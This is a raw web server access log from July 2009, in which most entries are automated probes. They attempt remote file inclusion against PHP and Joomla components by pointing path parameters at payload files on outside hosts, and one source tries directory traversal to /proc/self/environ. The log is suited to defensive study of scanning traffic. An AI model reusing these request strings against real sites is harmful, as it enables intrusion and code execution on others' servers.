193.254.241.12 - - [12/Jul/2009:07:07:15 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.79"
38.99.44.103 - - [12/Jul/2009:07:07:08 -0400] "GET /logs/access_log.Q109063000 HTTP/1.0" 200 5874408 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
209.59.12.99 - - [12/Jul/2009:07:09:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.158.167.98 - - [12/Jul/2009:07:10:35 -0400] "GET /logs/access_log.Q109061900//index.php?name=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
212.158.167.98 - - [12/Jul/2009:07:10:35 -0400] "GET //index.php?name=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 208 "-" "libwww-perl/5.810"
212.158.167.98 - - [12/Jul/2009:07:10:35 -0400] "GET /logs//index.php?name=http://83.3.132.70/iGeoMap/www//tmp/roxx.jpg??? HTTP/1.1" 404 213 "-" "libwww-perl/5.810"
140.117.120.161 - - [12/Jul/2009:07:10:59 -0400] "GET /logs/error_log.Q109062000/solpot.html?body=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
140.117.120.161 - - [12/Jul/2009:07:10:59 -0400] "GET /solpot.html?body=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
140.117.120.161 - - [12/Jul/2009:07:10:59 -0400] "GET /logs/solpot.html?body=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
140.117.120.161 - - [12/Jul/2009:07:10:59 -0400] "GET /logs/error_log.Q109061400/solpot.html?body=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
66.249.68.70 - - [12/Jul/2009:07:11:03 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Googlebot-Image/1.0"
66.249.68.70 - - [12/Jul/2009:07:11:03 -0400] "GET /images/items/0531033_thumb.jpg HTTP/1.1" 200 2141 "-" "Googlebot-Image/1.0"
83.149.97.4 - - [12/Jul/2009:07:13:36 -0400] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://aboutav.com//back/test.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
83.149.97.4 - - [12/Jul/2009:07:13:36 -0400] "GET //snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://aboutav.com//back/test.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
209.59.12.99 - - [12/Jul/2009:07:14:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.65.41.165 - - [12/Jul/2009:07:14:25 -0400] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.65.41.165 - - [12/Jul/2009:07:14:25 -0400] "GET /logs/access_log.Q109061600//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
69.65.41.165 - - [12/Jul/2009:07:14:25 -0400] "GET /logs//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
69.65.41.165 - - [12/Jul/2009:07:14:25 -0400] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
69.65.41.165 - - [12/Jul/2009:07:14:25 -0400] "GET /logs//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
69.65.41.165 - - [12/Jul/2009:07:14:25 -0400] "GET /logs/access_log.Q109061600//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
216.117.128.143 - - [12/Jul/2009:07:14:47 -0400] "GET /logs//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
216.117.128.143 - - [12/Jul/2009:07:14:47 -0400] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
216.117.128.143 - - [12/Jul/2009:07:14:47 -0400] "GET /logs/access_log.Q109061600//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
216.117.128.143 - - [12/Jul/2009:07:14:47 -0400] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
216.117.128.143 - - [12/Jul/2009:07:14:47 -0400] "GET /logs/access_log.Q109061600//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
216.117.128.143 - - [12/Jul/2009:07:14:47 -0400] "GET /logs//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:07:14:56 -0400] "GET /logs//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://crenshawdesignz.com/themes/ability/css/lolid1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:07:14:56 -0400] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://crenshawdesignz.com/themes/ability/css/lolid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:07:14:58 -0400] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://crenshawdesignz.com/themes/ability/css/lolid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:07:14:58 -0400] "GET /logs//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://crenshawdesignz.com/themes/ability/css/lolid1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:07:15:01 -0400] "GET /logs/access_log.Q109061600//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://crenshawdesignz.com/themes/ability/css/lolid1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:07:15:02 -0400] "GET /logs/access_log.Q109061600//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://crenshawdesignz.com/themes/ability/css/lolid1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
63.246.153.58 - - [12/Jul/2009:07:16:11 -0400] "GET /logs/access_log.Q109052000//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://83.3.132.70/iGeoMap/www//tmp/master-id.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
63.246.153.58 - - [12/Jul/2009:07:16:11 -0400] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://83.3.132.70/iGeoMap/www//tmp/master-id.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
63.246.153.58 - - [12/Jul/2009:07:16:11 -0400] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://83.3.132.70/iGeoMap/www//tmp/master-id.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
69.65.41.165 - - [12/Jul/2009:07:16:21 -0400] "GET /logs/access_log.Q109061600%20%20//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
69.65.41.165 - - [12/Jul/2009:07:16:39 -0400] "GET /logs/access_log.Q109061600%20%20//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Jul/2009:07:16:53 -0400] "GET ///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Jul/2009:07:16:53 -0400] "GET /logs///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Jul/2009:07:16:53 -0400] "GET /logs/access_log.Q109061800///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Jul/2009:07:16:53 -0400] "GET /logs/access_log.Q109060500///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.65.41.165 - - [12/Jul/2009:07:17:12 -0400] "GET /logs/error_log.Q109061600%20%20//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Jul/2009:07:17:13 -0400] "GET /logs/access_log.Q109060500///index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
63.246.153.58 - - [12/Jul/2009:07:17:33 -0400] "GET /logs/access_log.Q109061100//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://83.3.132.70/iGeoMap/www//tmp/master-id.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
217.169.210.130 - - [12/Jul/2009:07:17:40 -0400] "GET /logs/access_log.Q109060500/index.php?option=com_events&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
69.65.41.165 - - [12/Jul/2009:07:17:42 -0400] "GET /logs/error_log.Q109061600%20%20//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
216.117.128.143 - - [12/Jul/2009:07:17:47 -0400] "GET /logs/access_log.Q109061600%20%20//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
216.117.128.143 - - [12/Jul/2009:07:17:52 -0400] "GET /logs/access_log.Q109061600%20%20//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:07:19:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.70.32.2 - - [12/Jul/2009:07:19:39 -0400] "GET /logs/access_log.Q109061600%20%20//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://crenshawdesignz.com/themes/ability/css/lolid1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:07:19:42 -0400] "GET /logs/access_log.Q109061600%20%20//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://crenshawdesignz.com/themes/ability/css/lolid1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
216.117.128.143 - - [12/Jul/2009:07:20:03 -0400] "GET /logs/error_log.Q109061600%20%20//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
216.117.128.143 - - [12/Jul/2009:07:20:15 -0400] "GET /logs/error_log.Q109061600%20%20//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:07:20:43 -0400] "GET /logs/error_log.Q109061600%20%20//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://crenshawdesignz.com/themes/ability/css/lolid1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
67.15.48.60 - - [12/Jul/2009:07:20:43 -0400] "GET /?mosConfig_admin_path=http://www.gornik-klodawa.pl/media/id.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.810"
67.15.48.60 - - [12/Jul/2009:07:20:43 -0400] "GET /logs/access_log.Q109060800/?mosConfig_admin_path=http://www.gornik-klodawa.pl/media/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.810"
67.15.48.60 - - [12/Jul/2009:07:20:43 -0400] "GET /logs/?mosConfig_admin_path=http://www.gornik-klodawa.pl/media/id.txt??? HTTP/1.1" 200 9190 "-" "libwww-perl/5.810"
217.70.32.2 - - [12/Jul/2009:07:20:49 -0400] "GET /logs/error_log.Q109061600%20%20//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://crenshawdesignz.com/themes/ability/css/lolid1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
67.15.48.60 - - [12/Jul/2009:07:20:51 -0400] "GET /logs/access_log.Q109052000/?mosConfig_admin_path=http://www.gornik-klodawa.pl/media/id.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.810"
82.194.87.219 - - [12/Jul/2009:07:21:38 -0400] "GET /logs///blank.php?path=http://www.vusaeurope.eu/cms/images/id? HTTP/1.1" 404 214 "-" "libwww-perl/5.822"
217.169.210.130 - - [12/Jul/2009:07:21:55 -0400] "GET /logs/access_log.Q109063000/index.php?option=com_extcalendar&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.76"
217.169.210.130 - - [12/Jul/2009:07:21:56 -0400] "GET /index.php?option=com_extcalendar&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.76"
217.169.210.130 - - [12/Jul/2009:07:21:56 -0400] "GET /logs/index.php?option=com_extcalendar&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.noasc.com/media/chi.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.76"
218.145.71.148 - - [12/Jul/2009:07:22:30 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
218.145.71.148 - - [12/Jul/2009:07:22:30 -0400] "GET /logs/access_log.Q109060600//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
218.145.71.148 - - [12/Jul/2009:07:22:30 -0400] "GET /logs/access_log.Q109060600/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
218.145.71.148 - - [12/Jul/2009:07:22:30 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
218.145.71.148 - - [12/Jul/2009:07:22:31 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
218.145.71.148 - - [12/Jul/2009:07:22:32 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 213 "-" "XXXXXX"
218.145.71.148 - - [12/Jul/2009:07:22:32 -0400] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "XXXXXX"
218.145.71.148 - - [12/Jul/2009:07:22:35 -0400] "GET /logs/access_log.Q109060600//index.php?option=com_log&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
218.145.71.148 - - [12/Jul/2009:07:22:40 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
218.145.71.148 - - [12/Jul/2009:07:22:40 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 208 "-" "XXXXXX"
218.145.71.148 - - [12/Jul/2009:07:22:41 -0400] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "XXXXXX"
218.145.71.148 - - [12/Jul/2009:07:22:44 -0400] "GET /logs/access_log.Q109060600//index.php?option=com_log&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
218.145.71.148 - - [12/Jul/2009:07:22:45 -0400] "GET /logs/access_log.Q109063000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
218.145.71.148 - - [12/Jul/2009:07:22:46 -0400] "GET /logs/access_log.Q109063000/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
218.145.71.148 - - [12/Jul/2009:07:22:46 -0400] "GET /logs/access_log.Q109063000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 235 "-" "XXXXXX"
218.145.71.148 - - [12/Jul/2009:07:22:47 -0400] "GET /logs/access_log.Q109063000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "XXXXXX"
82.194.87.219 - - [12/Jul/2009:07:22:48 -0400] "GET /logs///blank.php?path=http://www.vusaeurope.eu/cms/images/id? HTTP/1.1" 404 214 "-" "libwww-perl/5.822"
211.245.23.158 - - [12/Jul/2009:07:23:20 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.245.23.158 - - [12/Jul/2009:07:23:20 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.245.23.158 - - [12/Jul/2009:07:23:21 -0400] "GET /logs/access_log.Q109070200%20%20/addons/guildbank/searcharrays.php?addonDir=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.245.23.158 - - [12/Jul/2009:07:24:00 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.245.23.158 - - [12/Jul/2009:07:24:00 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.245.23.158 - - [12/Jul/2009:07:24:07 -0400] "GET /logs/access_log.Q109070200%20%20/addons/guildbank/searcharrays.php?addonDir=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:07:24:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.65.41.165 - - [12/Jul/2009:07:25:10 -0400] "GET /logs/error_log.Q109061600//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
210.205.57.2 - - [12/Jul/2009:07:25:18 -0400] "GET /phphtml.php?htmlclass_path=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
210.205.57.2 - - [12/Jul/2009:07:25:31 -0400] "GET /phphtml.php?htmlclass_path=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
79.148.238.69 - - [12/Jul/2009:07:26:10 -0400] "GET /logs/access_log.Q109063000/index.php?option=com_extcalendar&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
79.148.238.69 - - [12/Jul/2009:07:26:15 -0400] "GET /index.php?option=com_extcalendar&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
79.148.238.69 - - [12/Jul/2009:07:26:16 -0400] "GET /logs/index.php?option=com_extcalendar&task=view_detail&Itemid=&mosConfig_absolute_path=http://www.groovetrackers.com/movies/id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
217.70.32.2 - - [12/Jul/2009:07:27:20 -0400] "GET /logs/error_log.Q109061600//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://crenshawdesignz.com/themes/ability/css/lolid1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Jul/2009:07:27:54 -0400] "GET /logs/error_log.Q109061600//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://crenshawdesignz.com/themes/ability/css/lolid1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:07:29:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.70 - - [12/Jul/2009:07:29:22 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1193984193333000BBB1053+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.245.23.158 - - [12/Jul/2009:07:30:13 -0400] "GET /logs/access_log.Q109070200/addons/guildbank/searcharrays.php?addonDir=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
216.117.128.143 - - [12/Jul/2009:07:30:16 -0400] "GET /logs/error_log.Q109061600//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
65.254.32.2 - - [12/Jul/2009:07:30:24 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
65.254.32.2 - - [12/Jul/2009:07:30:24 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
65.254.32.2 - - [12/Jul/2009:07:30:24 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
216.117.128.143 - - [12/Jul/2009:07:30:33 -0400] "GET /logs/error_log.Q109061600//modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://lyriclopedi.com/plugins/system/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.245.23.158 - - [12/Jul/2009:07:31:05 -0400] "GET //admin.php?vwar_root=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.245.23.158 - - [12/Jul/2009:07:31:05 -0400] "GET /logs/access_log.Q109070300//admin.php?vwar_root=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.245.23.158 - - [12/Jul/2009:07:31:05 -0400] "GET /logs//admin.php?vwar_root=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.146.93.11 - - [12/Jul/2009:07:31:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/registration_grafting.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
72.146.93.11 - - [12/Jul/2009:07:31:39 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/registration_grafting.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
72.146.93.11 - - [12/Jul/2009:07:31:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/registration_grafting.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
72.146.93.11 - - [12/Jul/2009:07:31:39 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/registration_grafting.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
66.11.230.36 - - [12/Jul/2009:07:31:42 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
66.11.230.36 - - [12/Jul/2009:07:31:42 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.11.230.36 - - [12/Jul/2009:07:31:42 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
65.254.32.2 - - [12/Jul/2009:07:31:42 -0400] "GET /logs/access_log.Q109061300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
